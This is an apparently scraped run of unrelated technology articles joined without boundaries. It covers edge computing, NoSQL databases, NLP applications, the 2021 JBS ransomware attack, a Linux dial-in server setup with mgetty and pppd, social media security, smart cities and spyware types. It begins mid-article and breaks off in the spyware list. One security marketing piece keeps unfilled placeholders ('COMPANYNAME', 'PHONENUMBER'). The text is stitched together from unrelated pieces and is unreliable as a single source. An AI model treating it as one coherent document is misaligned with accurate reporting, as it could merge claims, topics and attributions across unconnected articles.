For example, a manufacturer may use IoT devices in their production environment to automate certain parts of the assembly line. Rather than having the IoT device send a signal to the central data center every time a new product triggers it and the data center sends instructions back, the manufacturer can keep data processing nearby via an edge caching server or load instructions onto the IoT device itself and have it respond to the trigger on its own. In the case of a self-driving car or critical infrastructure monitoring, real-time data processing becomes essential, requiring data processing on the device itself and rapid communication via local infrastructure, making 5G a critical driver of edge computing and the Internet of Things. With edge devices able to process data and communicate, the networking model becomes something akin to the peer-to-peer networks of the early 2000s, communicating with data centers when necessary. Edge computing can also help companies become more flexible. Businesses can set up local edge data centers to extend their reach into new markets rather than building entirely new offices. Additionally, because IoT devices are always on with edge computing, they can provide businesses with an unprecedented amount of information. All this data leads to greater insights for the business, allowing them to easily pivot or make adjustments if something isn’t working as it should. Edge computing is also key to enabling remote work, especially as 5G infrastructure becomes more mainstream. Currently, edge nodes aren’t widely used enough to reach all residential areas, but once 5G is widely available, businesses could combine it with their edge networks and extend them to their customers and remote employees. Because edge computing is less centralized, companies that use it are less vulnerable to distributed denial of service (DDoS) attacks.
With so many edge data centers and servers working simultaneously, it’s difficult for attackers to manipulate enough traffic to shut them all down. While there are more points to secure versus having a single data center, the distributed nature of the edge removes any single point of failure. Edge computing also makes it easier to quarantine affected devices and remediate threats without shutting down the whole network. Along with spreading out the attack surface so it’s more difficult to make a widespread attack, edge computing also transfers smaller amounts of data at once. While transferring data would normally be vulnerable to attack, the smaller amounts make it a less appealing target to malicious actors. Plus, devices only communicate with the data center when necessary, like for updates or data refreshes. This way, even if a device is breached, the amount of data that is compromised will be much smaller. Reduced workloads on servers The average home in the United States contained 10 internet connected devices in 2020, and that doesn’t even include business devices. Each of a company’s devices generates an insane amount of data which could easily overload servers if left unchecked – a risk that will increase with the huge data demands of artificial intelligence (AI) and remote devices. However, edge computing spreads out the processing of this data into multiple locations to reduce the workload on central servers. Most businesses worry about DDoS attacks, but even legitimate traffic could be a danger to centralized servers in the right circumstances. For example, a 24-hour gym franchise might use IoT scanners to control access into the facility. If all of those devices were sending and receiving signals from the central system, that would be a pretty inefficient way to run a network and would also create a single point of failure that could shut everything down. 
Instead, the sensor just reacts to the trigger and allows the approved individual inside, updated by the central data center only as information changes. The importance of AI in edge computing AI is going to become a critical part of edge computing as it becomes more mainstream. Self-driving cars are a great example for this. When self-driving cars become a reality, they’ll need the ability to take in and process information in real-time. To do this, the cars will include AI to perceive the world around them, make inferences based on the data they take in (in this case, traffic signals and other cars on the road), and then act based on that information. Edge computing is key to this because real-time processing wouldn’t be possible if the cars had to send all of the information they take in off to the central data center and then wait for it to come back. Instead, the car itself would become an edge node, able to process all of the data within its own CPUs. Peter Levine of venture capital firm Andreessen Horowitz likens this model to the peer-to-peer (P2P) networking of the early 2000s, where devices communicate with each other and contact data centers only as needed. Implementing edge computing Edge computing isn’t necessary for every company, but those with remote data processing needs could gain a lot from it. If an organization decides to move forward with edge computing, it can either build the infrastructure itself or contract with a third-party vendor to provide the necessary hardware and software. In some cases, say with critical infrastructure, businesses may want tighter control over their edge computing capabilities. If so, they may decide on a do-it-yourself (DIY) model. The business would need to purchase edge computing hardware from vendors like Dell or HP according to their network needs and then add the right management software. 
Then, the company’s IT department would need to set everything up and ensure the devices and software are connected and compatible. While this offers more customization and flexibility, it’s a lot of work that smaller businesses may not want to undertake. If the cost is too high for companies to set up their edge computing network on their own, they may opt instead to contract with third-party providers. For this option, the vendor would install their own equipment and software, and the company would pay a flat monthly rate. The vendor would handle all of the updates and maintenance, reducing the organization’s need for dedicated IT staff. This option requires fewer resources from the purchasing company, but it doesn’t have the same level of control or customization. Intelligence in devices themselves will also be critical to edge computing, so businesses will want to evaluate their options carefully. Is edge computing the right move for your business? Edge computing is a great option for businesses with many locations or that need to reduce latency for customers far away from their headquarters. Streaming services, large franchises, and companies that manage their own supply chain could benefit from edge computing. You should take stock of your current computing requirements and note any latency that you’re seeing. If you’re seeing time loss or your servers are getting close to overloading regularly, it may be time to consider edge computing.
Moving on from the relational databases that characterized the last two decades and more, NoSQL databases have gained popularity as a better method of data handling, and below are five reasons why: 1. Elastic Scalability In the past, the best DBA services still had to depend on scaling up whenever there was a need for expansion. This meant purchasing larger servers to deal with the increasing data load. NoSQL databases offer the much easier option of scaling out – the databases are distributed across multiple pre-existing hosts. With an increase in the availability requirements and transaction rates, scaling out onto virtual environments offers a more economical alternative to hardware scaling. It is not as easy to scale out RDBMS on commodity clusters, but with NoSQL databases, transparent expansion is already pre-programmed so that they can scale out to fill new nodes. These are also designed bearing in mind low-cost commodity hardware. 2. Useful for big data The last decade has witnessed a rapid growth in the transaction rates, as have the volumes of data that need to be stored. This is what led to the creation of the term ‘big data’, and has been affectionately referred to as the “industrial revolution of data” in certain circles. The capacity of RDBMSs grew to match the requirements of the new data volumes, but just as happened with the transaction rates, there’s only so much data volume that can be managed by a single RDBMS practically. Instead, many people are turning to NoSQL systems like Hadoop to handle their ‘big data’ volumes, as these outperform the capabilities of the most prominent RDBMS. 3. Reduced reliance on in-house DBAs A major disadvantage of implementing these powerful high-end RDBMSs is that maintenance is only possible by employing trained DBAs, which certainly don’t come cheap. They are intricately involved in the design, installation and performance tuning of these RDBMSs, which makes them virtually indispensable.
On the other hand, NoSQL databases have been designed to require less hands-on administration, with features like data distribution, auto-repair, and simplified data models. While somebody still has to be accountable for the management of the systems, organizations implementing the latter can instead rely on the best remote DBA services, which are cheaper and work just as well, rather than incurring the cost of retaining and progressively training an in-house DBA. 4. It’s cheaper NoSQL databases are designed to utilize cheap commodity server clusters for the management of ever-growing transaction and data volumes. RDBMSs, on the other hand, require expensive storage systems and patented servers, which means that the latter has a greater cost per volume of data stored. This means that for a much lower price, you can store and process a higher volume of data. 5. Agile data models RDBMSs give colossal headaches when it comes to change management, especially for the large production ones. Even a minor change must be carefully monitored, and may still involve some downtime or reduction in service levels. NoSQL does not have such restrictions on its data models, and even the more rigid NoSQL databases based on the BigTable structure still allow for relative flexibility, like the addition of new columns with no major breakdowns. This means that changes to applications or database schema need not be managed as a single change unit, making the process much easier.
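The agile-data-model point is easy to illustrate with document-style records. This toy sketch (field names invented) shows why adding a "column" in a document store needs no migration: new records simply carry the extra field, and readers tolerate its absence in old ones:

```python
# A "collection" of document-style records, as a document store would hold them.
users = [
    {"id": 1, "name": "Ada"},                              # original shape
    {"id": 2, "name": "Grace", "email": "g@example.com"},  # new field, no ALTER TABLE
]

def emails(collection):
    # Readers handle missing fields instead of failing on a rigid schema.
    return [u.get("email", "unknown") for u in collection]
```

In a relational schema the same change would mean an ALTER TABLE migration (and possibly downtime) before any row could carry the new value.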
Today, with the digitization of everything, 80 percent of the data being created is unstructured. Audio, video, our social footprints, the data generated from conversations between customer service reps, and the tons of legal document text processed in the financial sector are examples of unstructured data stored in big data systems. Organizations are turning to natural language processing (NLP) technology to derive understanding from the myriad of this unstructured data available online and in call logs. Natural language processing (NLP) is the ability of computers to understand human speech as it is spoken. NLP is a branch of artificial intelligence that has many important implications for the ways that computers and humans interact. Machine learning has helped computers parse the ambiguity of human language. Apache OpenNLP, the Natural Language Toolkit (NLTK) and Stanford NLP are open-source NLP libraries used in the real-world applications below. Here are multiple ways NLP is used today: The most basic and well-known application of NLP is Microsoft Word's spell checking. Text analysis, also known as sentiment analytics, is a key use of NLP. Businesses are most concerned with comprehending how their customers feel emotionally and use that data for the betterment of their service. Email filters are another important application of NLP. By analyzing the emails that flow through their servers, email providers can calculate the likelihood that an email is spam based on its content, using naive Bayes spam filtering. Call center representatives engage with customers to hear a list of specific complaints and problems. Mining this data for sentiment can lead to incredibly actionable intelligence that can be applied to product placement, messaging, design, or a range of other use cases. Google, Bing and other search systems use NLP to extract terms from text to populate their indexes and to parse search queries.
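The naive Bayes spam filtering mentioned above can be illustrated with a toy classifier. Everything here is an assumption made for the sketch: the two-message training corpus, equal class priors, and whitespace tokenization. A real filter trains on far more data and far richer features:

```python
from collections import Counter
import math

# Tiny hypothetical training corpus (real filters use thousands of messages).
spam = ["win money now", "free prize click now"]
ham = ["meeting at noon", "project status update"]

def word_counts(msgs):
    counts = Counter()
    for m in msgs:
        counts.update(m.split())
    return counts

spam_counts, ham_counts = word_counts(spam), word_counts(ham)
vocab = set(spam_counts) | set(ham_counts)

def log_likelihood(msg, counts, total):
    # Laplace (add-one) smoothing so unseen words don't zero out the score.
    return sum(math.log((counts[w] + 1) / (total + len(vocab))) for w in msg.split())

def is_spam(msg):
    # Equal class priors assumed, so we just compare likelihoods.
    spam_score = log_likelihood(msg, spam_counts, sum(spam_counts.values()))
    ham_score = log_likelihood(msg, ham_counts, sum(ham_counts.values()))
    return spam_score > ham_score
```

The log-space sum is the standard trick for avoiding underflow when multiplying many small per-word probabilities.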
Google Translate applies machine translation technologies in not only translating words but in understanding the meaning of sentences to provide a true translation. Many important decisions in financial markets rely on NLP, taking plain-text announcements and extracting the relevant information in a format that can be factored into algorithmic trading decisions. For example, news of a merger between companies can have a big impact on trading decisions, and the speed at which the particulars of the merger (players, prices, who acquires whom) can be incorporated into a trading algorithm can have profit implications in the millions of dollars. Since the invention of the typewriter, the keyboard has been the king of the human-computer interface. But today, virtual assistants with voice recognition, like Amazon's Alexa, Google's Now, Apple's Siri and Microsoft's Cortana, respond to vocal prompts and do everything from finding a coffee shop to getting directions to our office, as well as tasks like turning on the lights at home or switching on the heat, depending on how digitized and wired-up our lives are. Question Answering – IBM Watson is the most prominent example of question answering via information retrieval, helping guide decisions in areas like healthcare, weather and insurance. Therefore it is clear that natural language processing plays a very important role in new machine-human interfaces. It's an essential tool for leading-edge analytics and is the near future.
What Does the JBS Cyberattack Mean for Businesses in Columbia, MD Cybersecurity issues hardly get to the public’s attention until a company with their details becomes a victim of the crime. However, in the past few months, a different kind of threat has taken precedence, threatening the survival of Americans. From gas and now to meat, cybercriminals are hitting the nation and individuals where it hurts the most. In late May 2021, JBS, the world’s largest meat processing company, suffered a ransomware attack. So extensive was the cyberattack that it had the potential to disrupt the food chain around the world. In addition, it raised concerns about the potential spike in meat prices and disruption of food supply as a national security threat. The hack happened a few days after the attack on the Colonial Pipeline, affecting gas supply across the U.S. east coast. According to Andre Nogueira, CEO of JBS, the company parted with $11 million in ransom after being forced to stop operations in 13 of its plants. They made the payment in Bitcoin cryptocurrency to reduce the extent of the damage. While it was a hard decision to make, it helped mitigate further damage to the food supply chain, including grocery stores and restaurants. Have Hackers Shifted to Global Organizations in Ransomware? According to Merrick Garland, U.S. Attorney General, ransomware attacks are getting worse by the day. He echoes concerns by White House officials who have held emergency meetings to work out responses to the national security threat. In response to these two threats, he says that the government must do everything possible as the attacks are becoming more severe. For many years, companies have contended with easy-to-employ ransomware attacks using unsophisticated methods. These include phishing by sending dubious links to unsuspecting employees. Through one link, many companies became victims of cybercrime by having their computer networks locked down in exchange for a ransom. 
However, their tactic seems to be changing, with their focus shifting to large national corporations. Their strategy includes selling hacking software to the highest bidder through the “ransomware-as-a-service (RaaS)” business model. Hackers ask for payment through cryptocurrency because it’s harder to track than fiat currency. Crypto also has fewer regulations by the government. What Do These Attacks Mean for Your Business? It can be tempting to think that because ransomware attacks focus on global companies, your company is safe. However, cybercriminals are at work, devising ways to attack both large and small businesses. Statistics show that since the onset of COVID-19, more businesses have been victims of hacking than ever before: 67% of small businesses have experienced an attack, while 58% have had a breach. This tells you that you can’t afford to be lax about the security of your systems, as the attacks can be devastating for your business. For many small and medium enterprises, the amount hackers demand in ransom is one they can’t afford to pay up and still survive. They also may not have the capacity to recover from the devastation. It also helps to note that the cost of a ransomware attack on a Columbia business is more than the immediate losses. It can lock down the entire business by disrupting its functionality. Your customers who rely on your business to meet their needs may not be patient enough to wait. Some of them will look for a new provider immediately. Once this happens, you may lose them altogether. Others may lack confidence in your business, fearing that their details will become compromised. How Can You Protect Your Business? With the increasing vulnerability of your business systems, it helps to take proactive measures to protect them. While cybersecurity solutions aren’t the ultimate protection, they can go a long way to enhance overall security.
This means that your employees also need to be careful and alert to avoid putting your systems at risk, even with these measures in place. The cybersecurity industry is constantly working to improve security standards to protect users. However, the level of compliance to these standards depends on your specific industry and the type of confidential data you handle regularly. The best way to ensure compliance is to work with an experienced cybersecurity solution provider. Even as the standards shift, they will see to it that you remain compliant. Put Up a Robust Data Backup System You can’t afford to run your business without data backups. Your company runs on data, and losing it means that you also lose your business. Restoring it may be costly and time-consuming, and sometimes you may not get everything back. This is where a backup system comes in to help the situation. Having a reliable backup system helps your business get back up and running in the event of an attack. Regular data backup will ensure you have updated copies of the data at all times. Remember to store the backup in a different location from the primary data source. Create a Detailed Disaster Recovery Plan With the frequency of cyberattacks on both large and small businesses, it’s no longer a question of if a disaster will strike. Instead, you should ask yourself how prepared you are to respond when hackers strike. A comprehensive recovery plan will help you carry your business through a disaster. Ensure that every team member knows how to respond to maximize productivity and restoration. In the case of JBS, the company was able to restore everything even before most people knew about the attack. Such a recovery plan can restore consumers’ confidence and enable your company to retain its standing when coming out of an attack. Given the increasing cyberattack incidents, you need to evaluate how prepared your business is for an attack. 
Check how well-equipped you are to respond to hacking and whether your business would remain standing. The best way to go about this is to work with a cybersecurity expert. They will do an in-depth analysis to test your systems and identify any existing loopholes. Then, they will recommend the most suitable security solutions to protect your business. At Advantage Industries, this is our area of specialization. So contact us today to discuss and analyze your business IT needs and security.
Intel Corp’s patent for a RISC-like architecture that can accept multiple operating systems and programs with mixed instruction sets reportedly takes pains to distinguish itself from other dual-mode processors such as DEC’s VAX, a processor made in the 1980s that accepted VAX code and code for its predecessor, the PDP-11 (CI No 3,193). However, one reader suggests there is a fair similarity, as far as this one snippet of description goes, to the DEC PDP-12. Its Laboratory Computer Handbook (1971) describes the PDP-12 processor, which can execute instructions from either of two instruction sets, the PDP-8 instruction set and the LINC instruction set. The PDP-8 was arguably the first RISC computer (well before the acronym RISC had been coined), and the LINC instruction set was rather more complex. Interrupts could be taken in either mode. Instructions from both instruction sets could be mixed within a single program or even a single routine; each instruction set offered an instruction for explicitly switching to the other instruction set. Our reader continues: I am sure there are many innovations in Merced, but it is always interesting to observe how history repeats when circumstances are suitable.
DDoS attacks are among the most important security concerns facing customers that are moving their applications to the cloud. Discover what DDoS attacks are, why they're important, and how Cyclotron's offerings can protect your business and customer-sensitive data. What is DDoS? Distributed denial of service (DDoS) attacks are a form of cybercrime where the attacker floods a server with internet traffic to prevent people from accessing connected online services and sites. This is a very common cyber-attack that is bad for a company's reputation, as it discredits the company's skills and frustrates potential and current customers. Discover some of the largest DDoS attacks here: https://www.a10networks.com/blog/5-most-famous-ddos-attacks/ When companies move their applications to the cloud, DDoS attacks are a huge concern. At Cyclotron, we believe in protecting both businesses and customer-sensitive data to avoid these attacks. Impacts of DDoS attacks According to Infosecurity Magazine, "The average cost of a DDoS attack in the US is around $218k without factoring in any ransomware costs." How we prevent DDoS attacks To prevent DDoS attacks, it is important to have accurate, automatic, and rapid protection. This involves having a solution that can monitor network traffic in real time, for both small and large attacks. At Cyclotron we secure your cloud or hybrid environment with cloud security solutions to meet the needs of the enterprise. We protect your data, apps, and infrastructure quickly with built-in security services in Azure that include unparalleled security intelligence to help identify rapidly evolving threats early, so you can respond quickly.
In part 1 we looked at a simple setup for creating and sharing a dial-up Internet connection. Today we’ll learn how to build a dial-in server. A dial-in server is useful for remote system administration, remote user access, or building a low-cost WAN. A Linux dial-in server can serve as a gateway for both Linux and Windows boxes. There are three primary elements to a Linux dial-in server: the getty that answers the line, the pppd configuration, and authentication. A getty — ‘get tty’ — is a daemon that monitors serial lines. Modems are represented by ttySN: /dev/ttyS0, /dev/ttyS1, /dev/ttyS2, and /dev/ttyS3. There are all kinds of different Linux and Unix gettys. mgetty is especially good: it supports data, fax, and voice, and integrates nicely with pppd. If your system does not have mgetty, I recommend getting it. As root, open /etc/mgetty/login.config for editing. (Note: check your documentation for file locations, as they may vary.) We want to add this line: /AutoPPP/ - - /usr/sbin/pppd file /etc/ppp/options.server Note that a similar line may already be present: /AutoPPP/ - a_ppp /usr/sbin/pppd auth -chap +pap login debug These represent two different ways of doing the same thing. The first line, which I prefer, puts all the pppd options into a file named /etc/ppp/options.server. You can name this file anything you like. (The docs I learned from use /etc/ppp/options.server, and I’m too lazy to think of something else.) PPP is a peer-to-peer protocol, so our dial-in server options could also go into /etc/ppp/options. Since this machine is being used as a server, I like the separate file, as it eases the strain on my aging brain. mgetty is not run from the command line; it’s a daemon. Start it at boot with an entry in inittab: S0:2345:respawn:/sbin/mgetty ttyS0 /dev/ttyS0 Note the tricky bits: on my system the modem is an external serial modem at /dev/ttyS0. I’ve selected runlevels 2, 3, 4, and 5. Use appropriate values for your system. Then run init q to start it up.
One way to configure /etc/ppp/options.server is to copy the contents of /etc/ppp/options, comments and all, and then edit it for dial-in server duties. This is the good and educational method. The fast way is to start fresh with a minimal options file, one command per line. ‘asyncmap’ could be a chapter by itself; set the value to zero to turn off escaping control characters, unless you have a need to manage escaping control characters (now doesn’t that inspire some interesting mental images…). Do not leave this out, because then, by default, all control characters will be escaped, and nothing will work right. The ‘modem’ and ‘crtscts’ lines enable hardware flow control. I can’t imagine using software (xonxoff) flow control, unless you have an unimaginably ancient or bizarre modem. Fortunately, both ancient and bizarre modems are well supported in Linux, if this is indeed your situation. ‘lock’ locks the serial device so that no other system functions can take it over. The ‘require-pap’ and ‘refuse-chap’ lines select the type of authentication. ‘proxyarp’ is very important: it makes dial-in clients reachable as if they were local machines on your network. All machines dialing in to your server must have an IP address, given as a colon-delimited pair: the first IP address belongs to the server, and the second, after the colon, is assigned to the user dialing in. Obviously, you don’t want any duplicate IPs on the subnet. You can use either PAP or CHAP for authentication, but CHAP is more secure. Usernames and passwords are stored in /etc/ppp/chap-secrets or /etc/ppp/pap-secrets. On the server, you’ll need to enter all the username/password pairs that are allowed access. The clients need only their own username/password. For the simplest PAP authentication, add the ‘noauth’ option to /etc/ppp/options on all the clients that are authorized to connect to your dial-in server (see the PPPD Auth Gotcha from part 1 for more on this).
The format is the same for both files, and supplying the username and password is sufficient:

user        server    secret      address
username    *         password    *

Of course, server names and IP addresses can be added for increased security and control. Alternatively, you can do away with PAP/CHAP secrets entirely by adding the ‘login’ option to /etc/ppp/options. This tells pppd to authenticate against Linux system passwords, rather than hassling with secrets files. Good to Go At this point, we have a functioning dial-in server that you can use for connecting to a fileserver, as a gateway to other PCs inside the network, or as a quick and easy WAN link. (See the Linux Network Administrator’s Guide for how to set up routing using ip-up and ip-down.) Dial-on-Demand and Persistent Dialing are two useful methods of keeping a client connected. Dial-on-demand is the frugal way to manage a dialup connection. To activate it — when sending email, for example — add the ‘demand’, ‘holdoff’, and ‘idle’ options to /etc/ppp/options. ‘demand’ means simply run on demand: PPP starts partway, and then waits for the ‘connect’ command. ‘holdoff’ sets, in seconds, how long to wait between redials. ‘idle’ will disconnect ppp after the configured number of seconds of no activity on the line. To keep the line alive constantly, use the ‘persist’ option instead; this tells ppp to stay connected, and to redial after the holdoff interval (60 seconds in my setup) if the connection is broken. That wraps up our two-part look at building dial-up and dial-in servers for Linux. I hope you’ve enjoyed it!
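Pulling the pieces above together, here is a sketch of what the configuration files described in this article might contain. This is a reconstruction based on the options discussed here, not the author's exact listings; the IP addresses, username, and password are placeholders:

```
# /etc/ppp/options.server -- one command per line
asyncmap 0          # don't escape control characters
modem               # use modem control lines
crtscts             # hardware flow control
lock                # lock the serial device against other processes
require-pap         # select PAP authentication...
refuse-chap         # ...and refuse CHAP
proxyarp            # make dial-in clients reachable on the LAN
192.168.1.1:192.168.1.50   # server IP : IP assigned to the caller

# /etc/ppp/pap-secrets (or chap-secrets) on the server
# user      server  secret      address
alice       *       sekrit      *

# Dial-on-demand additions to a client's /etc/ppp/options
demand              # bring the link up when traffic appears
holdoff 30          # seconds to wait between redials
idle 300            # hang up after 300 idle seconds

# Persistent-dialing alternative
persist             # stay connected; redial if the link drops
holdoff 60          # redial after 60 seconds
```

Check the pppd man page on your system before using these; option names and defaults can vary between pppd versions.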
Social media might make it easy to stay connected, but it comes with a lot of negative side effects, particularly in regard to security for both personal and professional use. If social media isn’t used properly, it could spell trouble for your organization. How can you foster proper social media usage so that your organization doesn’t suffer from poor security practices? It all starts by spreading awareness. There are a lot of reasons why social media can be troublesome. For one, it’s simply not safe, regardless of your age or profession. The Internet’s anonymity provides many people with a considerable vector for attacking others. Some might just be trolling and bothering others, but sometimes this can go too far. Children who find themselves on social media may be subject to all manner of harassment from their peers, thanks to the Internet’s perceived promise that nothing done on it has consequences. The more business-minded side of social media attacks comes in the form of phishing scams and other attacks on sensitive information. Hackers will stop at nothing to steal information of value from both individuals and companies. You might be surprised by how much value a hacker can get out of your personally identifiable information. Many users share sensitive information like their address, phone number, and email, often publicly on display on social media profiles. Other times, hackers might take advantage of phishing tactics to weasel information out of users. They can be surprisingly crafty in these endeavors, going as far as impersonating people that you know. They might send personal messages in hopes that you’ll respond and give them the opportunity they need to steal your information. It’s clear that you need to be smart about what you post and when you post it, but what’s the best way to do so?
For starters, it’s important to remember that everything you do on social media can likely be traced back to you. That status you made about the workplace or an unsavory comment about a client could come back to bite you in the future. Be conscious about what you’re posting and ask yourself if it really needs to be out in the public domain. Chances are that it doesn’t. This will also keep you from sharing pictures of your meals, which is a bonus for pretty much all of your social media connections. Second, be careful about any information that you share with anyone over social media. If someone messages you out of the blue and asks you for something personal, think twice before telling them your bank account number or Social Security number. If there is ever any doubt about whether the person messaging you is genuine, a simple rule is to not give up anything of value. For more great tips and tricks about how to stay secure, reach out to COMPANYNAME at PHONENUMBER.
Artificial Intelligence systems are being used more and more in our everyday lives to help us humans make decisions. Right now many AI algorithms are a black box; we’re not quite sure how the system arrives at an outcome and this is a problem. The solution is to come up with AI systems that explain their decision-making – what is known as Explainable AI or XAI. But what exactly is explainable AI? In this explainer video, Cognilytica analysts explain the current problem, define XAI, and show why it’s important to have.
This morning, while sipping my favorite green tea at home, I automatically checked my smartphone for office mail. Although there was no reason not to enjoy the morning time with myself, an escalation thread was sub-consciously running in my mind, and my intention was to check the current status of that escalation, which was occupying a portion of my mind concerning one of my projects. While going through the various threads of communication, and sensing some anxiety entering my mind, I suddenly wondered what I was doing during the best time of my day. This is nowadays very common, a recurring instance that perhaps many of us experience. The competitive world, long working hours, rising expectations on the personal and professional fronts, work pressures and personal aspirations all demand a multi-tasking of the mind. All of us are used to multi-tasking, and it is a quality without which we cannot think of completing our day. If we take time to notice, we will find out how frequently we multi-task. When we drive vehicles, text, use computers, make phone calls and attend meetings, we are subconsciously juggling various tasks and ranking them based on their perceived order of importance. Some other examples include drafting a mail while attending a call, listening to music while working on a document, and working on more than one project/task at a time, like driving while attending a call (which is proven to be very dangerous). Understanding the importance and high usage of multi-tasking in our daily lives, I researched the subject and was amazed to find out the following facts: - Multi-tasking is a computer industry term that refers to the ability of an operating system to execute several tasks concurrently by rapidly switching the processor among them (Reference: Wikipedia). Nowadays, multi-tasking seems to be an important KRA (Key Result Area) of the human mind, which is treated like a computer from which the same performance is expected.
- Computers multi-task. Humans don't. A computer's operating system enables it to perform more than one task at a time without losing data or failing to process information. The human brain doesn’t work this way. What we call "multi-tasking" is actually "serial tasking" or "task-switching" — moving from one task to another in rapid succession. - Our ability to focus on different things is one of the strengths of our truly incredible minds. It's a skill we would definitely not want to lose. However, psychologists and neurobiologists have both shown that we pay a price when we multi-task. Since the depth of our attention governs the depth of our memory and thought, multi-tasking can reduce our ability to understand and learn. While we are able to do more when we multi-task, we learn less. As we juggle an increasingly large number of different tasks, we start to pay a price in our cognition. - There have been studies to prove that the human brain is not meant for multi-tasking, more often called ‘brain juggling’ in psychological terms. Robert Rogers, Ph. D, and Stephen Monsell, D. Phil found that on switching between two tasks, the human brain comes across two types of resistance - firstly - to adjust the mental controls to attune to the new task, and secondly - to stop the mental controls from processing the first task. The cost of switching tasks is always higher than repeating the same task. It is approximately 40%, which cannot be neglected. - As the task becomes more complex, the cost of switching between tasks gets higher. Complex tasks always require deep research, and the deeper the mind goes into a task, the more time it would take to come out of that task. In this scenario, switching between two tasks becomes tough. - When you’re trying to accomplish two dissimilar tasks, each one requiring some level of consideration and attention, multi-tasking falls apart. 
Your brain just can’t take in and process two simultaneous, separate streams of information and encode them fully into short-term memory. When information doesn’t make it into short-term memory, it can’t be transferred into long-term memory for recall later. - Multi-tasking involves engaging in two tasks simultaneously. But here's the catch. It's only possible if two conditions are met: 1) at least one of the tasks is so well learned as to be automatic, meaning no focus or thought is necessary to engage in the task (e.g., walking or eating), and 2) they involve different types of brain processing. For example, you can read effectively while listening to classical music because reading comprehension and processing instrumental music engage different parts of the brain. However, your ability to retain information while reading and listening to music with lyrics declines significantly because both tasks activate the language center of the brain. - Multi-tasking may seem to be efficient at surface but in reality it costs more, and also affects the quality while increasing error. For example, using a cell phone while driving and losing by a second in task switching can cost one’s life, which cannot be compensated by any means. We are in control of the information we receive. By filtering the flow of data and registering what is really important for us, we can develop the practice to improve focus in our everyday lives. However, reducing information overload doesn't require blocking or abandoning technological tools, which is kind of a necessity in today’s world. Instead, we need to find effective ways to accept only relevant information and discard or minimize superficial information. The best way to do this is through awareness of the danger of long term multi-tasking through which we can achieve a more favorable and effective environment at home or the workplace. 
Wonderfully, this piece of information can be used in understanding user psychology in the field of user experience design. We are now building applications in bulk for smart phones, tablets and devices on the move. Keeping the effect of multi-tasking in mind, we can understand how much attention to detail a user exerts on applications on such devices. These apps must be ’brain-dead simple’ to work well. The adaptive quality of the human mind can be used in a more constructive way by focusing its massive energy on a task to perfect completion or can be used in a dissipative way to lose its energy through multi-tasking. The choice is ours. Rubenstein J, Meyer DE, Evans JE. (2001). Executive Control of Cognitive Processes in Task Switching. Journal of Experimental Psychology. 27(4):763-797 Crenshaw, Dave. The Myth of Multitasking; How "Doing it All" gets Nothing Done. Jossey-Bass 2008.
Connect-World’s eFlyer – 16th Feb 2018 A smart city is an urban environment that utilises a variety of electronic data collection sensors to provide information which is used to manage assets and resources efficiently. It includes data collected from citizens, devices, and assets that is processed and analysed to monitor and manage traffic and transportation systems, power plants, water supply networks, waste management, law enforcement, information systems, schools, libraries, hospitals, and other community services. Smart Cities draw on information and communication technology (ICT), and the emerging network the Internet of things (IoT), to optimize the efficiency of city operations and services and connect to citizens. The overarching mission of a smart city is to optimize city functions and drive economic growth while improving quality of life for its citizens using smart technology and data analysis. Other terms that have been used for similar concepts include: Cyberville, digital city, electronic communities, flexicity, information city, intelligent city, knowledge-based city, MESH city, telecity, teletopia, ubiquitous city, wired city. ICT technology is used to enhance quality, performance and interactivity of urban services, to reduce costs and resource consumption and to increase contact between citizens and government. Smart city applications are developed to manage urban flows and allow for real-time responses. A smart city is therefore in a position to respond to challenges more directly than one with a simple “transactional” relationship with its citizens. Smart city technology is also increasingly being used to improve public safety, from monitoring areas of high crime to improving emergency preparedness with sensors.
For example, smart sensors can be critical components of an early warning system before droughts, floods, landslides or hurricanes. Major technological, economic and environmental changes have generated interest in smart cities, including climate change, economic restructuring, the move to online retail and entertainment, ageing populations, urban population growth and pressures on public finances. The European Union (EU) has devoted constant efforts to devising a strategy for achieving ‘smart’ urban growth for its metropolitan city-regions. The EU has developed a range of programmes under ‘Europe’s Digital Agenda’. In 2010, it highlighted its focus on strengthening innovation and investment in ICT services for the purpose of improving public services and quality of life. Arup estimates that the global market for smart urban services will be US$400 billion per annum by 2020. Prominent examples of Smart City technologies and programmes have been implemented in Singapore, Dubai, Milton Keynes, Southampton, Amsterdam, Barcelona, Madrid, Stockholm, New York and Beijing, which has about 500 smart city pilot projects, the highest number in the world, according to Deloitte. Often considered the gold standard of Smart Cities, the city-state of Singapore uses sensors and IoT-enabled cameras to monitor the cleanliness of public spaces, crowd density and the movement of locally registered vehicles. Its smart technologies help companies and residents monitor energy use, waste production and water use in real time. Singapore is also testing autonomous vehicles, including full-size robotic buses, as well as an elderly monitoring system to ensure the health and well-being of its senior citizens. In spite of the great benefits of smart cities, critics worry that city managers will not keep data privacy and security top of mind, fearing the exposure of the data that citizens produce on a daily basis to the risk of hacking or misuse.
Additionally, the presence of sensors and cameras may be perceived as an invasion of privacy or government surveillance. To address this, data collected by smart cities should be anonymized and should not include personally identifiable information. Thus, while many different IoT devices are catching on with consumers, from smart watches to connected cars, consumers are uneasy about being watched, listened to, or tracked by devices they place in their homes. Thanks to such discomfort, consumer interest in connected home technology lags behind their interest in other types of IoT devices, Deloitte found. Cities and communities generate data through a vast and growing network of connected technologies that power new and innovative services, ranging from apps that can help drivers find parking spots to sensors that can improve water quality. Such services improve individual lives and make cities more efficient. While smart city technologies can raise privacy issues, sophisticated data privacy programs can mitigate these concerns while preserving the benefits of cities that are cleaner, faster, safer, more efficient, and more sustainable.
Spyware is a type of malware that covertly infects a computer or mobile device and collects sensitive information like passwords, personal identification numbers (PINs), and payment information. The information is then sent to advertisers, data collection firms, or malicious third parties for a profit. Spyware is one of the most common threats on the internet. It was once most commonly installed through Windows desktop browsers, but has evolved to operate on Apple computers and mobile phones as well. Mobile spyware attacks have become much more common and advanced as people rely on their phones to conduct banking activities and access other sensitive information. However, not all software that tracks online activity is malicious. For example, some website tracking cookies serve a legitimate function by customizing a user’s website experience, such as remembering login information. Anyone can be a target of spyware. Authors of spyware do not typically target a specific person the way a spear phishing attack would. Spyware authors prioritize the information they can gather rather than who it is from, so spyware attacks try to collect as many victims as possible. Since spyware typically runs in the background of the operating system, it is difficult to detect and even harder to mitigate without advanced security tools and solutions. Types of Spyware There are several types of spyware. While all spyware programs share the common goal of stealing personal information, each uses unique tactics to do so. 1. Adware Adware tracks a user’s web surfing history and activity to optimize advertising efforts. Although adware is technically a form of spyware, it does not install software on a user’s computer or capture keystrokes.
